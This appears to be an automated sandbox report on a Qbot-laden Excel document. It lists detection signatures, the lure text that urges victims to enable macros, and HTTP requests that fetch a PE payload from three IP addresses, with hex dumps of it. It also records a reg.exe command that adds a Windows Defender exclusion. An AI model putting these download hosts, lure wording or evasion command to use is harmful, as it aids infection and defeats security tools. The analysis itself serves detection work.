Windows Analysis Report Document_748968552-10062021.xls

Overview

General Information

Sample Name: Document_748968552-10062021.xls
Analysis ID: 498107
MD5: 140385a5f54604fa006db5ffd1b64b5a
SHA1: 73673b923c566c9d6eccad4be74044bcf7e12733
SHA256: 9644edafe62913d5442c6849e44a9a8e780cf465f44c677bab0894ae9561985a
Most interesting Screenshot:

Detection

Hidden Macro 4.0 Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Qbot
Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
PE file overlay found
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.489853323.00000000028E0000.00000004.00000001.sdmp
Source: Binary string: c:\Think\Evening\Plan\Base\Think.pdb source: regsvr32.exe, 00000004.00000002.489763377.000000006E083000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.582378510.000000006DED3000.00000002.00020000.sdmp, explorer.exe, 00000007.00000003.490164469.00000000028E0000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01AEF6 FindFirstFileW,FindNextFileW, 4_2_6E01AEF6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE6AEF6 FindFirstFileW,FindNextFileW, 6_2_6DE6AEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_0008AEF6 FindFirstFileW,FindNextFileW, 7_2_0008AEF6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCBAEF6 FindFirstFileW,FindNextFileW, 12_2_6DCBAEF6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB0AEF6 FindFirstFileW,FindNextFileW, 15_2_6DB0AEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0008AEF6 FindFirstFileW,FindNextFileW, 16_2_0008AEF6

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 44475.7050777778[1].dat.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 190.14.37.107:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 190.14.37.107:80

Networking:

Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 06 Oct 2021 14:55:00 GMTContent-Type: application/octet-streamContent-Length: 1087488Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44475.7050777778.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 30 df 36 c6 74 be 58 95 74 be 58 95 74 be 58 95 c0 22 ac 95 76 be 58 95 e3 e0 59 94 76 be 58 95 7d c6 cb 95 6d be 58 95 bf d1 5a 94 70 be 58 95 bf d1 5d 94 61 be 58 95 bf d1 5c 94 7e be 58 95 bf d1 5d 94 55 be 58 95 c0 22 b7 95 73 be 58 95 74 be 59 95 cc be 58 95 bf d1 59 94 75 be 58 95 bf d1 52 94 4f be 58 95 bf d1 58 94 75 be 58 95 bf d1 5a 94 75 be 58 95 52 69 63 68 74 be 58 95 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 fd f7 6c 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1a 00 18 07 00 00 8c 13 00 00 00 00 00 ec 45 00 00 00 10 00 00 00 30 07 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 1a 00 00 04 00 00 8f be 10 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 77 10 00 a4 00 00 00 04 78 10 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 1a 00 9c 1d 00 00 24 65 10 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 65 10 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 07 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7e 16 07 00 00 10 00 00 00 18 07 00 00 04 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 cc 50 09 00 00 30 07 00 00 52 09 00 00 1c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 1a 0a 00 00 90 10 00 00 0c 00 00 00 6e 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9c 1d 00 00 00 b0 1a 00 00 1e 00 00 00 7a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 06 Oct 2021 14:55:03 GMTContent-Type: application/octet-streamContent-Length: 1087488Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44475.7050777778.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 30 df 36 c6 74 be 58 95 74 be 58 95 74 be 58 95 c0 22 ac 95 76 be 58 95 e3 e0 59 94 76 be 58 95 7d c6 cb 95 6d be 58 95 bf d1 5a 94 70 be 58 95 bf d1 5d 94 61 be 58 95 bf d1 5c 94 7e be 58 95 bf d1 5d 94 55 be 58 95 c0 22 b7 95 73 be 58 95 74 be 59 95 cc be 58 95 bf d1 59 94 75 be 58 95 bf d1 52 94 4f be 58 95 bf d1 58 94 75 be 58 95 bf d1 5a 94 75 be 58 95 52 69 63 68 74 be 58 95 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 fd f7 6c 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1a 00 18 07 00 00 8c 13 00 00 00 00 00 ec 45 00 00 00 10 00 00 00 30 07 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 1a 00 00 04 00 00 8f be 10 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 77 10 00 a4 00 00 00 04 78 10 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 1a 00 9c 1d 00 00 24 65 10 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 65 10 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 07 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7e 16 07 00 00 10 00 00 00 18 07 00 00 04 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 cc 50 09 00 00 30 07 00 00 52 09 00 00 1c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 1a 0a 00 00 90 10 00 00 0c 00 00 00 6e 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9c 1d 00 00 00 b0 1a 00 00 1e 00 00 00 7a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 06 Oct 2021 14:55:04 GMTContent-Type: application/octet-streamContent-Length: 1087488Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44475.7050777778.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 30 df 36 c6 74 be 58 95 74 be 58 95 74 be 58 95 c0 22 ac 95 76 be 58 95 e3 e0 59 94 76 be 58 95 7d c6 cb 95 6d be 58 95 bf d1 5a 94 70 be 58 95 bf d1 5d 94 61 be 58 95 bf d1 5c 94 7e be 58 95 bf d1 5d 94 55 be 58 95 c0 22 b7 95 73 be 58 95 74 be 59 95 cc be 58 95 bf d1 59 94 75 be 58 95 bf d1 52 94 4f be 58 95 bf d1 58 94 75 be 58 95 bf d1 5a 94 75 be 58 95 52 69 63 68 74 be 58 95 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 fd f7 6c 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1a 00 18 07 00 00 8c 13 00 00 00 00 00 ec 45 00 00 00 10 00 00 00 30 07 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 1a 00 00 04 00 00 8f be 10 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 77 10 00 a4 00 00 00 04 78 10 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 1a 00 9c 1d 00 00 24 65 10 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 65 10 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 07 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7e 16 07 00 00 10 00 00 00 18 07 00 00 04 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 cc 50 09 00 00 30 07 00 00 52 09 00 00 1c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 1a 0a 00 00 90 10 00 00 0c 00 00 00 6e 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9c 1d 00 00 00 b0 1a 00 00 1e 00 00 00 7a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /44475.7050777778.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.107Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44475.7050777778.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 94.140.114.111Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44475.7050777778.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 188.165.62.50Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: regsvr32.exe, 00000004.00000002.489373144.00000000023D0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.581202819.0000000002070000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.877955987.0000000002070000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.490733503.0000000001C70000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.489126953.0000000001F00000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.584981238.0000000001D80000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.581022938.0000000001D70000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.590289184.00000000009B0000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.584823458.00000000008C0000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000004.00000002.489373144.00000000023D0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.581202819.0000000002070000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.877955987.0000000002070000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.585331966.0000000000D60000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[1].dat

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" in the yellow bar 19 above. 20 21 example of notification 22 23 ( 0 Thlsfi|eor
Source: Screenshot number: 4 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
Source: Document image extraction number: 0 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 0 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Document image extraction number: 1 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 1 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[2].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Celod.wac2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[1].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Celod.wac1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Celod.wac
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[3].dat
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E026EF0 4_2_6E026EF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E02237E 4_2_6E02237E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E021790 4_2_6E021790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E025000 4_2_6E025000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE75000 6_2_6DE75000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE71790 6_2_6DE71790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE7237E 6_2_6DE7237E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE76EF0 6_2_6DE76EF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_00095000 7_2_00095000
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_00096EF0 7_2_00096EF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_0009237E 7_2_0009237E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_00091790 7_2_00091790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCC5000 12_2_6DCC5000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCC1790 12_2_6DCC1790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCC237E 12_2_6DCC237E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCC6EF0 12_2_6DCC6EF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB15000 15_2_6DB15000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB11790 15_2_6DB11790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB1237E 15_2_6DB1237E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB16EF0 15_2_6DB16EF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00095000 16_2_00095000
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00096EF0 16_2_00096EF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0009237E 16_2_0009237E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00091790 16_2_00091790
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Document_748968552-10062021.xls OLE, VBA macro line: Sub auto_close()
Source: Document_748968552-10062021.xls OLE, VBA macro line: Sub auto_open()
Source: Document_748968552-10062021.xls OLE, VBA macro line: Private Sub saWorkbook_Opensa()
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01C702 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 4_2_6E01C702
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01CBB9 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 4_2_6E01CBB9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE6CBB9 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 6_2_6DE6CBB9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE6C702 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 6_2_6DE6C702
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCBCBB9 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 12_2_6DCBCBB9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCBC702 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 12_2_6DCBC702
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB0CBB9 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 15_2_6DB0CBB9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB0C702 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 15_2_6DB0C702
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\regsvr32.exe Process Stats: CPU usage > 98%
PE file does not import any functions
Source: Celod.wac2.25.dr Static PE information: No import functions for PE file found
Source: Celod.wac.7.dr Static PE information: No import functions for PE file found
Source: Celod.wac.17.dr Static PE information: No import functions for PE file found
Source: Celod.wac1.16.dr Static PE information: No import functions for PE file found
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Fmjlcuic' /d '0'
Document contains embedded VBA macros
Source: Document_748968552-10062021.xls OLE indicator, VBA macros: true
PE file overlay found
Source: Celod.wac2.25.dr Static PE information: Data appended to the last section found
Source: Celod.wac.17.dr Static PE information: Data appended to the last section found
Source: Celod.wac1.16.dr Static PE information: Data appended to the last section found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write
Source: 44475.7050777778[1].dat.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Celod.wac.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 44475.7050777778[2].dat.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
